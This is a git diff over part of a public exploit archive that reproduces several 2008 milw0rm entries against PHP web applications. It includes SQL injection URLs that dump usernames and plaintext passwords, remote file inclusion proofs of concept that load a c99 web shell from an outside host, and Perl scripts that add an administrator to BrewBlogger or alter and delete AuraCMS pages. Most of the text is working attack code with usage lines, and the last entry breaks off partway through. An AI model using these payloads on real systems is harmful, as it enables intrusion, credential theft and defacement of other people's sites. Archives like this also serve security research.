+[*] Vendor Has Not Been Notified!
+
+
+
+[*] DESCRIPTION:
+
+ Mole Group Hotel Script suffers from a insecure mysql query in the "file" variable.
+ This can lead to malicous users arbitrary selecting confidential information from the database.
+
+ See below for the SQL injection.
+
+
+
+[*] SQL Injection:
+
+ http://site.com/index.php?file=1/**/UNION/**/ALL/**/SELECT/**/1,CONVERT(name/**/using/**/latin1),3,4/**/FROM/**/settings/*
+
+
+
+[*] NOTE/TIP:
+
+ admin login is at /admin/
+
+
+
+[*] GREETZ:
+
+ milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !
+
+
+
+[-] Peace...
+
+ ...t0pP8uZz !
+
+
+
+-[*]+================================================================================+[*]-
+-[*]+ Mole Group Hotel Script 1.0 Remote SQL Injection Vulnerability +[*]-
+-[*]+================================================================================+[*]-
+
+# milw0rm.com [2008-07-08]
diff --git a/platforms/php/webapps/6022.txt b/platforms/php/webapps/6022.txt
index 24de6f235..155cf8a93 100755
--- a/platforms/php/webapps/6022.txt
+++ b/platforms/php/webapps/6022.txt
@@ -1,58 +1,58 @@
--[*]+================================================================================+[*]-
--[*]+ Real Estate Script <= 1.1 Remote SQL Injection Vulnerability +[*]-
--[*]+================================================================================+[*]-
-
-
-
-[*] Discovered By: t0pP8uZz
-[*] Discovered On: 8 JULY 2008
-[*] Script Download: http://www.mole-group.com/content/view/41/55/
-[*] DORK: N/A
-
-
-
-[*] Vendor Has Not Been Notified!
-
-
-
-[*] DESCRIPTION:
-
- Real Estate Script from mole-group.com contains a insecure mysql query flaw, which
- allows a remote attacker to execute arbitrary mysql querys and gaining access to confidential information.
- like username, passwords, email address's etc.
-
- see below for a example.
-
-
-
-[*] SQL Injection:
-
-
- http://site.com/index.php?go=listings&listing_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,CONVERT(CONCAT(0x3C666F6E7420636F6C6F723D7265643E,username,0x3a,password,0x3C2F666F6E743E)/**/using/**/latin1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/FROM/**/users/**/LIMIT/**/0,1/*
-
-
-
-[*] NOTE/TIP:
-
- admin login is at /admin/
- passwords are in plaintext
-
-
-
-[*] GREETZ:
-
- milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !
-
-
-
-[-] Peace...
-
- ...t0pP8uZz !
-
-
-
--[*]+================================================================================+[*]-
--[*]+ Real Estate Script <= 1.1 Remote SQL Injection Vulnerability +[*]-
--[*]+================================================================================+[*]-
-
-# milw0rm.com [2008-07-08]
+-[*]+================================================================================+[*]-
+-[*]+ Real Estate Script <= 1.1 Remote SQL Injection Vulnerability +[*]-
+-[*]+================================================================================+[*]-
+
+
+
+[*] Discovered By: t0pP8uZz
+[*] Discovered On: 8 JULY 2008
+[*] Script Download: http://www.mole-group.com/content/view/41/55/
+[*] DORK: N/A
+
+
+
+[*] Vendor Has Not Been Notified!
+
+
+
+[*] DESCRIPTION:
+
+ Real Estate Script from mole-group.com contains a insecure mysql query flaw, which
+ allows a remote attacker to execute arbitrary mysql querys and gaining access to confidential information.
+ like username, passwords, email address's etc.
+
+ see below for a example.
+
+
+
+[*] SQL Injection:
+
+
+ http://site.com/index.php?go=listings&listing_id=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,CONVERT(CONCAT(0x3C666F6E7420636F6C6F723D7265643E,username,0x3a,password,0x3C2F666F6E743E)/**/using/**/latin1),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31/**/FROM/**/users/**/LIMIT/**/0,1/*
+
+
+
+[*] NOTE/TIP:
+
+ admin login is at /admin/
+ passwords are in plaintext
+
+
+
+[*] GREETZ:
+
+ milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !
+
+
+
+[-] Peace...
+
+ ...t0pP8uZz !
+
+
+
+-[*]+================================================================================+[*]-
+-[*]+ Real Estate Script <= 1.1 Remote SQL Injection Vulnerability +[*]-
+-[*]+================================================================================+[*]-
+
+# milw0rm.com [2008-07-08]
diff --git a/platforms/php/webapps/6023.pl b/platforms/php/webapps/6023.pl
index 50e8d58d1..9ef9720bf 100755
--- a/platforms/php/webapps/6023.pl
+++ b/platforms/php/webapps/6023.pl
@@ -1,128 +1,128 @@ -#!/usr/bin/perl -#================================================= -# BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit -#================================================= -# -# ,--^----------,--------,-----,-------^--, -# | ||||||||| `--------' | O .. CWH Underground Hacking Team .. -# `+---------------------------^----------| -# `\_,-------, _________________________| -# / XXXXXX /`| / -# / XXXXXX / `\ / -# / XXXXXX /\______( -# / XXXXXX / -# / XXXXXX / -# (________( -# `------' -# -#AUTHOR : CWH Underground -#DATE : 8 July 2008 -#SITE : www.citec.us -# -# -##################################################### -#APPLICATION : BrewBlogger -#VERSION : 2.1.0.1 -#DOWNLOAD : http://downloads.sourceforge.net/brewblogger/BB2.1.0.1.zip?modtime=1196093070&big_mirror=0 -###################################################### -# -#Note: magic_quotes_gpc = off -# -#This Exploit will Add user to Administrator's Privilege. -# -##################################################################### -# Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos -# Special Thx : asylu3, str0ke, CITEC, milw0rm -##################################################################### - -use LWP; -use HTTP::Request; -use HTTP::Cookies; - -print "\n==================================================\n"; -print " BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit \n"; -print " \n"; -print " Discovered By CWH Underground \n"; -print "==================================================\n"; -print " \n"; -print " ,--^----------,--------,-----,-------^--, \n"; -print " | ||||||||| `--------' | O \n"; -print " `+---------------------------^----------| \n"; -print " `\_,-------, _________________________| \n"; -print " / XXXXXX /`| / \n"; -print " / XXXXXX / `\ / \n"; -print " / XXXXXX /\______( \n"; -print " / XXXXXX / \n"; -print " / XXXXXX / .. CWH Underground Hacking Team .. 
\n"; -print " (________( \n"; -print " `------' \n"; -print " \n"; - -if ($#ARGV + 1 != 3) -{ - print "Usage: ./xpl-brewblogger.pl \n"; - print "Ex. ./xpl-brewblogger.pl http://www.target.com/BrewBlogger/ cwhuser cwhpass\n"; - exit(); -} - -$blogurl = $ARGV[0]; -$user = $ARGV[1]; -$pass = $ARGV[2]; - - -$loginurl = $blogurl."includes/logincheck.inc.php"; -$adduserurl = $blogurl."admin/process.php?action=add&dbTable=users"; -$post_content = "x=38&y=15&realFirstName=FirstName&realLastName=LastName&userLevel=1&user_name=".$user."&password=".$pass; - -print "\n..::Login Page URL::..\n"; -print "$loginurl"; -print "\n..::Add User Page URL::..\n"; -print "$adduserurl\n\n"; -print "..::Login Process::..\n"; - -$ua = LWP::UserAgent->new; -$ua->cookie_jar(HTTP::Cookies->new); - -$request = HTTP::Request->new (POST => $loginurl); -$request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'); -$request->content_type ('application/x-www-form-urlencoded'); -$request->content ('loginUsername=\'+or+id=1/*&loginPassword=&x=0&y=0'); - -$response = $ua->request($request); -$location = $response -> header('Location'); -print "Result :: "; - -if ($location =~ /..\/admin\/index.php/) -{ - print "Login Success!!!\n"; -} -else -{ - print "Login Failed T T\n"; - exit(); -} - -print "\n..::Add Admin Process::..\n"; -$request = HTTP::Request->new (POST => $adduserurl); -$request->content_type ('application/x-www-form-urlencoded'); -$request->content ($post_content); -$response = $ua->request($request); - -$location = ""; -$location = $response->header('Location'); -print "Result :: "; - -if ($location =~ /index.php\?action=list&dbTable=users&confirm=true&msg=1/) -{ - print "Exploit Success!!!\n\n"; - print "Username :: ".$user."\n"; - print "Password :: ".$pass."\n"; - print "Role :: Administrator\n"; -} -else -{ - print "Exploit Failed T T\n"; - exit(); -} - -# milw0rm.com [2008-07-08] +#!/usr/bin/perl +#================================================= +# BrewBlogger 2.1.0.1 
Arbitrary Add Admin Exploit +#================================================= +# +# ,--^----------,--------,-----,-------^--, +# | ||||||||| `--------' | O .. CWH Underground Hacking Team .. +# `+---------------------------^----------| +# `\_,-------, _________________________| +# / XXXXXX /`| / +# / XXXXXX / `\ / +# / XXXXXX /\______( +# / XXXXXX / +# / XXXXXX / +# (________( +# `------' +# +#AUTHOR : CWH Underground +#DATE : 8 July 2008 +#SITE : www.citec.us +# +# +##################################################### +#APPLICATION : BrewBlogger +#VERSION : 2.1.0.1 +#DOWNLOAD : http://downloads.sourceforge.net/brewblogger/BB2.1.0.1.zip?modtime=1196093070&big_mirror=0 +###################################################### +# +#Note: magic_quotes_gpc = off +# +#This Exploit will Add user to Administrator's Privilege. +# +##################################################################### +# Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos +# Special Thx : asylu3, str0ke, CITEC, milw0rm +##################################################################### + +use LWP; +use HTTP::Request; +use HTTP::Cookies; + +print "\n==================================================\n"; +print " BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit \n"; +print " \n"; +print " Discovered By CWH Underground \n"; +print "==================================================\n"; +print " \n"; +print " ,--^----------,--------,-----,-------^--, \n"; +print " | ||||||||| `--------' | O \n"; +print " `+---------------------------^----------| \n"; +print " `\_,-------, _________________________| \n"; +print " / XXXXXX /`| / \n"; +print " / XXXXXX / `\ / \n"; +print " / XXXXXX /\______( \n"; +print " / XXXXXX / \n"; +print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; +print " (________( \n"; +print " `------' \n"; +print " \n"; + +if ($#ARGV + 1 != 3) +{ + print "Usage: ./xpl-brewblogger.pl \n"; + print "Ex. 
./xpl-brewblogger.pl http://www.target.com/BrewBlogger/ cwhuser cwhpass\n"; + exit(); +} + +$blogurl = $ARGV[0]; +$user = $ARGV[1]; +$pass = $ARGV[2]; + + +$loginurl = $blogurl."includes/logincheck.inc.php"; +$adduserurl = $blogurl."admin/process.php?action=add&dbTable=users"; +$post_content = "x=38&y=15&realFirstName=FirstName&realLastName=LastName&userLevel=1&user_name=".$user."&password=".$pass; + +print "\n..::Login Page URL::..\n"; +print "$loginurl"; +print "\n..::Add User Page URL::..\n"; +print "$adduserurl\n\n"; +print "..::Login Process::..\n"; + +$ua = LWP::UserAgent->new; +$ua->cookie_jar(HTTP::Cookies->new); + +$request = HTTP::Request->new (POST => $loginurl); +$request->header (Accept-Charset => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7'); +$request->content_type ('application/x-www-form-urlencoded'); +$request->content ('loginUsername=\'+or+id=1/*&loginPassword=&x=0&y=0'); + +$response = $ua->request($request); +$location = $response -> header('Location'); +print "Result :: "; + +if ($location =~ /..\/admin\/index.php/) +{ + print "Login Success!!!\n"; +} +else +{ + print "Login Failed T T\n"; + exit(); +} + +print "\n..::Add Admin Process::..\n"; +$request = HTTP::Request->new (POST => $adduserurl); +$request->content_type ('application/x-www-form-urlencoded'); +$request->content ($post_content); +$response = $ua->request($request); + +$location = ""; +$location = $response->header('Location'); +print "Result :: "; + +if ($location =~ /index.php\?action=list&dbTable=users&confirm=true&msg=1/) +{ + print "Exploit Success!!!\n\n"; + print "Username :: ".$user."\n"; + print "Password :: ".$pass."\n"; + print "Role :: Administrator\n"; +} +else +{ + print "Exploit Failed T T\n"; + exit(); +} + +# milw0rm.com [2008-07-08] diff --git a/platforms/php/webapps/6024.txt b/platforms/php/webapps/6024.txt index e86aa99e0..a687dc9de 100755 --- a/platforms/php/webapps/6024.txt +++ b/platforms/php/webapps/6024.txt 
@@ -1,33 +1,33 @@ -# Name Of Script : Dolphin PHP - -# Version : 6.1.2 - -# Download From : http://heanet.dl.sourceforge.net/sourceforge/boonex-dolphin/Dolphin-v.6.1.2-Free.zip - -# Found By : RoMaNcYxHaCkEr [ RoMaNTiC-TeaM ] - -# My Home Page : WwW.4RxH.CoM [ We Will Be Back Soon ] & Tryag.cc/cc [ Member From Tryag Forum ] - -# Type Of Exploit : RFI In Multiple Files - -# Introduce : Some Of Modules Is Infected And Some In Pulgins You Will See Below - -# POC : - -http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://rxh.freehostia.com/shells/c99in.txt? - -http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/plugins/safehtml/safehtml.php?dir[plugins]=http://rxh.freehostia.com/shells/c99in.txt? - -http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/ray/modules/global/inc/content.inc.php?sIncPath=http://rxh.freehostia.com/shells/c99in.txt? - -# Also We See RFI In Different Files But .htaccess Is Deny All Files In Some Path - -# Greet To : Tryag TeaM ,Injector TeaM ,Unknown Hacker , aLwHeD - -# Note : No One Perfect :) - -# rXh - -# bEST wISHES - -# milw0rm.com [2008-07-08] +# Name Of Script : Dolphin PHP + +# Version : 6.1.2 + +# Download From : http://heanet.dl.sourceforge.net/sourceforge/boonex-dolphin/Dolphin-v.6.1.2-Free.zip + +# Found By : RoMaNcYxHaCkEr [ RoMaNTiC-TeaM ] + +# My Home Page : WwW.4RxH.CoM [ We Will Be Back Soon ] & Tryag.cc/cc [ Member From Tryag Forum ] + +# Type Of Exploit : RFI In Multiple Files + +# Introduce : Some Of Modules Is Infected And Some In Pulgins You Will See Below + +# POC : + +http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/plugins/safehtml/HTMLSax3.php?dir[plugins]=http://rxh.freehostia.com/shells/c99in.txt? + +http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/plugins/safehtml/safehtml.php?dir[plugins]=http://rxh.freehostia.com/shells/c99in.txt? + +http://WwW.4RxH.CoM/Dolphin-v.6.1.2-Free/ray/modules/global/inc/content.inc.php?sIncPath=http://rxh.freehostia.com/shells/c99in.txt? 
+ +# Also We See RFI In Different Files But .htaccess Is Deny All Files In Some Path + +# Greet To : Tryag TeaM ,Injector TeaM ,Unknown Hacker , aLwHeD + +# Note : No One Perfect :) + +# rXh + +# bEST wISHES + +# milw0rm.com [2008-07-08] diff --git a/platforms/php/webapps/6025.txt b/platforms/php/webapps/6025.txt index 9fcb8f50a..25ed140d4 100755 --- a/platforms/php/webapps/6025.txt +++ b/platforms/php/webapps/6025.txt 
@@ -1,31 +1,31 @@ -------------------------------------------------------------------------------------------- - - Joomla Component com_content SQL Injection Vulnerabity - -------------------------------------------------------------------------------------------- - - - Author : unknown_styler - - Dork : inurl:com_content - - POC : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL} - - Example : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/* - ------------------------------------------------------------------------------------------------------------------------------------- - - Greetings : h4ck-y0u.org - -side note: - -Página de contenido -Projecte Joomla! -July 2004 -(C) 2005 Open Source Matters. All rights reserved. -http://www.gnu.org/copyleft/gpl.html GNU/GPL -admin@joomla.org -www.joomla.org -1.0.0 - -# milw0rm.com [2008-07-08] +------------------------------------------------------------------------------------------- + + Joomla Component com_content SQL Injection Vulnerabity + +------------------------------------------------------------------------------------------- + + + Author : unknown_styler + + Dork : inurl:com_content + + POC : http://localhost/index.php?option=index.php?option=com_content&task=blogcategory&id=60&Itemid={SQL} + + Example : http://localhost/index.php?option=com_content&task=blogcategory&id=60&Itemid=99999%20union%20select%201,concat_ws(0x3a,username,password),3,4,5%20from%20jos_users/* + +------------------------------------------------------------------------------------------------------------------------------------ + + Greetings : h4ck-y0u.org + +side note: + +Página de contenido +Projecte Joomla! +July 2004 +(C) 2005 Open Source Matters. All rights reserved. 
+http://www.gnu.org/copyleft/gpl.html GNU/GPL +admin@joomla.org +www.joomla.org +1.0.0 + +# milw0rm.com [2008-07-08] diff --git a/platforms/php/webapps/6027.txt b/platforms/php/webapps/6027.txt index c83324532..e78169164 100755 --- a/platforms/php/webapps/6027.txt +++ b/platforms/php/webapps/6027.txt 
@@ -1,58 +1,58 @@ --[*]+================================================================================+[*]- --[*]+ Last Minute Script <= 4.0 Remote SQL Injection Vulnerability +[*]- --[*]+================================================================================+[*]- - - - -[*] Discovered By: t0pP8uZz -[*] Discovered On: 8 JULY 2008 -[*] Script Download: http://www.mole-group.com/content/view/31/45/ -[*] DORK: N/A - - - -[*] Vendor Has Not Been Notified! - - - -[*] DESCRIPTION: - - Last Minute Script 4.0 (and all prior versions) suffer from a multirow SQL injection flaw, - This allows the remote attacker to execute arbitrary MySQL querys, and possibly gaining access - to confidential information. - - below is a example. - - - -[*] SQL Injection: - - http://site.com/index.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/CONVERT(CONCAT(name,0x3a,password,0x3C62723E)/**/using/**/latin1),2,3,4/**/FROM/**/users/* - - - -[*] NOTE/TIP: - - passwords are in plaintext. - - There are also other SQL injections around the site which i have found, So no one even bother to post has seperate vulns. - - - -[*] GREETZ: - - milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew ! - - - -[-] Peace... - - ...t0pP8uZz ! - - - --[*]+================================================================================+[*]- --[*]+ Last Minute Script <= 4.0 Remote SQL Injection Vulnerability +[*]- --[*]+================================================================================+[*]- - -# milw0rm.com [2008-07-08] +-[*]+================================================================================+[*]- +-[*]+ Last Minute Script <= 4.0 Remote SQL Injection Vulnerability +[*]- +-[*]+================================================================================+[*]- + + + +[*] Discovered By: t0pP8uZz +[*] Discovered On: 8 JULY 2008 +[*] Script Download: http://www.mole-group.com/content/view/31/45/ +[*] DORK: N/A + + + +[*] Vendor Has Not Been Notified! 
+ + + +[*] DESCRIPTION: + + Last Minute Script 4.0 (and all prior versions) suffer from a multirow SQL injection flaw, + This allows the remote attacker to execute arbitrary MySQL querys, and possibly gaining access + to confidential information. + + below is a example. + + + +[*] SQL Injection: + + http://site.com/index.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/CONVERT(CONCAT(name,0x3a,password,0x3C62723E)/**/using/**/latin1),2,3,4/**/FROM/**/users/* + + + +[*] NOTE/TIP: + + passwords are in plaintext. + + There are also other SQL injections around the site which i have found, So no one even bother to post has seperate vulns. + + + +[*] GREETZ: + + milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew ! + + + +[-] Peace... + + ...t0pP8uZz ! + + + +-[*]+================================================================================+[*]- +-[*]+ Last Minute Script <= 4.0 Remote SQL Injection Vulnerability +[*]- +-[*]+================================================================================+[*]- + +# milw0rm.com [2008-07-08] diff --git a/platforms/php/webapps/6028.txt b/platforms/php/webapps/6028.txt index 1af9d1fd3..777eb55f5 100755 --- a/platforms/php/webapps/6028.txt +++ b/platforms/php/webapps/6028.txt 
@@ -1,25 +1,25 @@ -# Name Of Script : Ray - -# Version : 3.5 - -# Download From : http://get.boonex.com/Ray-v.3.5-Suite-Free - -# Found By : RoMaNcYxHaCkEr [ RoMaNTiC-TeaM ] - -# My Home Page : WwW.4RxH.CoM [ We Will Be Back Soon ] & Tryag.cc/cc [ Member From Tryag Forum ] - -# Type Of Exploit : RFI - -# POC : - -http://WwW.4RxH.CoM/ray.3.5/modules/global/inc/content.inc.php?sIncPath=http://rxh.freehostia.com/shells/c99in.txt? - -# Greet To : Tryag TeaM ,Injector TeaM ,Unknown Hacker , aLwHeD - -# Note : No One Perfect :) - -# rXh - -# bEST wISHES - -# milw0rm.com [2008-07-08] +# Name Of Script : Ray + +# Version : 3.5 + +# Download From : http://get.boonex.com/Ray-v.3.5-Suite-Free + +# Found By : RoMaNcYxHaCkEr [ RoMaNTiC-TeaM ] + +# My Home Page : WwW.4RxH.CoM [ We Will Be Back Soon ] & Tryag.cc/cc [ Member From Tryag Forum ] + +# Type Of Exploit : RFI + +# POC : + +http://WwW.4RxH.CoM/ray.3.5/modules/global/inc/content.inc.php?sIncPath=http://rxh.freehostia.com/shells/c99in.txt? + +# Greet To : Tryag TeaM ,Injector TeaM ,Unknown Hacker , aLwHeD + +# Note : No One Perfect :) + +# rXh + +# bEST wISHES + +# milw0rm.com [2008-07-08] diff --git a/platforms/php/webapps/6033.pl b/platforms/php/webapps/6033.pl index 8060b5929..1690921c2 100755 --- a/platforms/php/webapps/6033.pl +++ b/platforms/php/webapps/6033.pl 
@@ -1,109 +1,109 @@ -#!/usr/bin/perl -# k1tk4t Public Security Advisory -# //////////////////////////////////////////////////////////// -# AuraCMS <= 2.2.2 (pages_data.php) Arbitrary Edit/Add/Delete data halaman exploit -# Vendor : http://www.auracms.org/ -# Kutu : ./js/pages/pages_data.php -# Keterangan : -# pada berkas pages_data.php dari awal hingga akhir tidak adanya aturan yang jelas, siapa, hak, level -# dalam mengakses berkas ini, kenapa perlu kejelasan aturan untuk berkas ini? -# karena didalam berkas ini terdapat kode yang dapat menghapus(delete) -# menambahkan(add), mengedit(edit) data halaman didalam database auracms, sehingga -# dengan tidak adanya kejelasan aturan pada berkas pages_data.php ini -# maka berkas ini mutlak terdapat KUTU yang amat menjijikan.... huee..... :( -# potongan kode dari pages_data.php -# --//-- -# 03: @ob_start('ob_gzhandler'); -# 04: @header("Content-type: text/plain; charset=utf-8;"); -# 05: @header("Cache-Control: no-cache, must-revalidate"); // HTTP/1.1 -# 06: @header("Pragma: no-cache"); -# 07: -# 08: include '../../includes/session.php'; -# 09: include '../../includes/config.php'; -# 10: include '../../includes/fungsi.php'; -# 11: include '../../includes/mysql.php'; -# 12: include '../../includes/json.php'; -# 13: -# 14: -# 15: if (!isset($_SESSION['mod_ajax'])){ -# 16: exit; -# 17: } -# --//-- -# Lihat.... 
tidak ada aturan di baris pertama hingga baris ke 17, mengenai siapa, hak, level dan aturan lainnya -# dalam mengakses berkas ini -# --//-- -# 20: switch (@$_GET['action']){ -# 21: -# 22: case 'add': -# 23: $_POST = array_map ('decodeURIComponent',$_POST); -# 24: $judul = $_POST['judul']; -# 25: $konten = $_POST['konten']; -# 26: $open['error'] = false; -# 27: $open['errorpesan'] = ''; -# 28: if (!empty($judul) && !empty($konten)){ -# 29: $query = mysql_query ("INSERT INTO `halaman` (`judul`,`konten`) VALUES ('$judul','$konten')"); -# 30: if ($query){ -# --//-- -# diatas ini satu contoh bagaimana berkas ini berperilaku, lihat... bisa menambahkan data halaman pada database kan... -# kacoooo, kacoooo, :( -# selebihnya liat sendiri yaa... panjang soalnya... :p -# -# Terimakasih untuk ; -# str0ke,DNX,n0c0py,L41n, -# NTOS-Team->[fl3xu5,opt1lc,sakitjiwa], -# eCHo->[y3dips,K-159,lirva32,dan staff lainnya] -use LWP::UserAgent; -use HTTP::Cookies; -use Getopt::Long; - -if ( !$ARGV[1] ) { - print "\n ///////////////////////////////////////////////////////////"; - print "\n // ..::> k1tk4t <::.. //"; - print "\n // AuraCMS <= 2.2.2 (pages_data.php) //"; - print "\n // Arbitrary Edit/Add/Delete data halaman exploit //"; - print "\n ///////////////////////////////////////////////////////////"; - print "\n[!] "; - print "\n[!] Penggunaan : perl auracms_pagesdata.pl [Site] [Path] [id_halaman] [options]"; - print "\n[!] Contoh : perl auracms_pagesdata.pl localhost /toko/ 1 -o 1"; - print "\n[!] Options : 1=Edit , 2=Delete, 3=Add"; - print "\n"; - exit; -} -my $host = $ARGV[0]; -my $path = $ARGV[1]; -my $idhalaman = $ARGV[2]; -my $isijudul = "AuraCMS <= 2.2.2 Hacked"; -my $isikonten = "Mohon Perhatian!!! 
terdapat kutu pada berkas pages_data.php, Arbitrary Edit-Add-Delete data halaman"; -my $ambilkue = "http://".$host.$path."index.php"; -my $browser = LWP::UserAgent->new; -my $kue = HTTP::Cookies->new(); -my $hasil = ""; -%options = (); -GetOptions(\%options, "o=i",); -if($options{"o"} && $options{"o"} == 1) { -$arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=edit_saved&id="; -} -if($options{"o"} && $options{"o"} == 2) { -$arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=delete&id="; -} -if($options{"o"} && $options{"o"} == 3) { -$arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=add&id="; -} - -$hasil = $browser->get($arbitrary); -if(!$hasil->is_success) { -die("[!] Gagal, berkas pages_data.php tidak tersedia\n"); -} - -# ambil kue dari website -$hasil = $browser->get($ambilkue); -$kue->extract_cookies($hasil); -$browser->cookie_jar($kue); - -# arbitrary exploit -$arbitrary .= $idhalaman; -$hasil = $browser->post($arbitrary,["judul"=>$isijudul,"konten"=>$isikonten],); -$konten = $hasil->content; -print $konten ; - -# milw0rm.com [2008-07-09] +#!/usr/bin/perl +# k1tk4t Public Security Advisory +# //////////////////////////////////////////////////////////// +# AuraCMS <= 2.2.2 (pages_data.php) Arbitrary Edit/Add/Delete data halaman exploit +# Vendor : http://www.auracms.org/ +# Kutu : ./js/pages/pages_data.php +# Keterangan : +# pada berkas pages_data.php dari awal hingga akhir tidak adanya aturan yang jelas, siapa, hak, level +# dalam mengakses berkas ini, kenapa perlu kejelasan aturan untuk berkas ini? +# karena didalam berkas ini terdapat kode yang dapat menghapus(delete) +# menambahkan(add), mengedit(edit) data halaman didalam database auracms, sehingga +# dengan tidak adanya kejelasan aturan pada berkas pages_data.php ini +# maka berkas ini mutlak terdapat KUTU yang amat menjijikan.... huee..... 
:( +# potongan kode dari pages_data.php +# --//-- +# 03: @ob_start('ob_gzhandler'); +# 04: @header("Content-type: text/plain; charset=utf-8;"); +# 05: @header("Cache-Control: no-cache, must-revalidate"); // HTTP/1.1 +# 06: @header("Pragma: no-cache"); +# 07: +# 08: include '../../includes/session.php'; +# 09: include '../../includes/config.php'; +# 10: include '../../includes/fungsi.php'; +# 11: include '../../includes/mysql.php'; +# 12: include '../../includes/json.php'; +# 13: +# 14: +# 15: if (!isset($_SESSION['mod_ajax'])){ +# 16: exit; +# 17: } +# --//-- +# Lihat.... tidak ada aturan di baris pertama hingga baris ke 17, mengenai siapa, hak, level dan aturan lainnya +# dalam mengakses berkas ini +# --//-- +# 20: switch (@$_GET['action']){ +# 21: +# 22: case 'add': +# 23: $_POST = array_map ('decodeURIComponent',$_POST); +# 24: $judul = $_POST['judul']; +# 25: $konten = $_POST['konten']; +# 26: $open['error'] = false; +# 27: $open['errorpesan'] = ''; +# 28: if (!empty($judul) && !empty($konten)){ +# 29: $query = mysql_query ("INSERT INTO `halaman` (`judul`,`konten`) VALUES ('$judul','$konten')"); +# 30: if ($query){ +# --//-- +# diatas ini satu contoh bagaimana berkas ini berperilaku, lihat... bisa menambahkan data halaman pada database kan... +# kacoooo, kacoooo, :( +# selebihnya liat sendiri yaa... panjang soalnya... :p +# +# Terimakasih untuk ; +# str0ke,DNX,n0c0py,L41n, +# NTOS-Team->[fl3xu5,opt1lc,sakitjiwa], +# eCHo->[y3dips,K-159,lirva32,dan staff lainnya] +use LWP::UserAgent; +use HTTP::Cookies; +use Getopt::Long; + +if ( !$ARGV[1] ) { + print "\n ///////////////////////////////////////////////////////////"; + print "\n // ..::> k1tk4t <::.. //"; + print "\n // AuraCMS <= 2.2.2 (pages_data.php) //"; + print "\n // Arbitrary Edit/Add/Delete data halaman exploit //"; + print "\n ///////////////////////////////////////////////////////////"; + print "\n[!] "; + print "\n[!] 
Penggunaan : perl auracms_pagesdata.pl [Site] [Path] [id_halaman] [options]"; + print "\n[!] Contoh : perl auracms_pagesdata.pl localhost /toko/ 1 -o 1"; + print "\n[!] Options : 1=Edit , 2=Delete, 3=Add"; + print "\n"; + exit; +} +my $host = $ARGV[0]; +my $path = $ARGV[1]; +my $idhalaman = $ARGV[2]; +my $isijudul = "AuraCMS <= 2.2.2 Hacked"; +my $isikonten = "Mohon Perhatian!!! terdapat kutu pada berkas pages_data.php, Arbitrary Edit-Add-Delete data halaman"; +my $ambilkue = "http://".$host.$path."index.php"; +my $browser = LWP::UserAgent->new; +my $kue = HTTP::Cookies->new(); +my $hasil = ""; +%options = (); +GetOptions(\%options, "o=i",); +if($options{"o"} && $options{"o"} == 1) { +$arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=edit_saved&id="; +} +if($options{"o"} && $options{"o"} == 2) { +$arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=delete&id="; +} +if($options{"o"} && $options{"o"} == 3) { +$arbitrary = "http://".$host.$path."js/pages/pages_data.php?action=add&id="; +} + +$hasil = $browser->get($arbitrary); +if(!$hasil->is_success) { +die("[!] Gagal, berkas pages_data.php tidak tersedia\n"); +} + +# ambil kue dari website +$hasil = $browser->get($ambilkue); +$kue->extract_cookies($hasil); +$browser->cookie_jar($kue); + +# arbitrary exploit +$arbitrary .= $idhalaman; +$hasil = $browser->post($arbitrary,["judul"=>$isijudul,"konten"=>$isikonten],); +$konten = $hasil->content; +print $konten ; + +# milw0rm.com [2008-07-09] diff --git a/platforms/php/webapps/6034.txt b/platforms/php/webapps/6034.txt index dfd6fbfd9..c567760be 100755 --- a/platforms/php/webapps/6034.txt +++ b/platforms/php/webapps/6034.txt 
@@ -1,43 +1,43 @@ -######################################################### -# -# PICS BUILDER (page) SQL Injection Vulnerability -#======================================================== -# Author: Hussin X = -# = -# Home : www.tryag.cc/cc = -# = -# email: darkangel_g85[at]Yahoo[DoT]com = -# = -#========================================================= -# -# script : http://www.dreamlevels.com/dreampics.php -# -# DorK : powered by Dreampics Builder -# -########################################################## - -Exploit: - -www.[target].com/Script/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users-- - - -L!VE DEMO: - -http://www.dreamlevels.com/demo/photosite/?page=-2+union+select+null,null,null,null,concat_ws(0x3a,user_login,user_password),null,null,null+from+users-- - - -Admin Login : - -/admin/ - -########################( Greetz )########################### -# # -# tryag.cc / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUR /str0ke # -# # -# Iraqihack / FAHD / mos_chori / Silic0n # -# # -############################################################# - - Im IRAQi - -# milw0rm.com [2008-07-09] +######################################################### +# +# PICS BUILDER (page) SQL Injection Vulnerability +#======================================================== +# Author: Hussin X = +# = +# Home : www.tryag.cc/cc = +# = +# email: 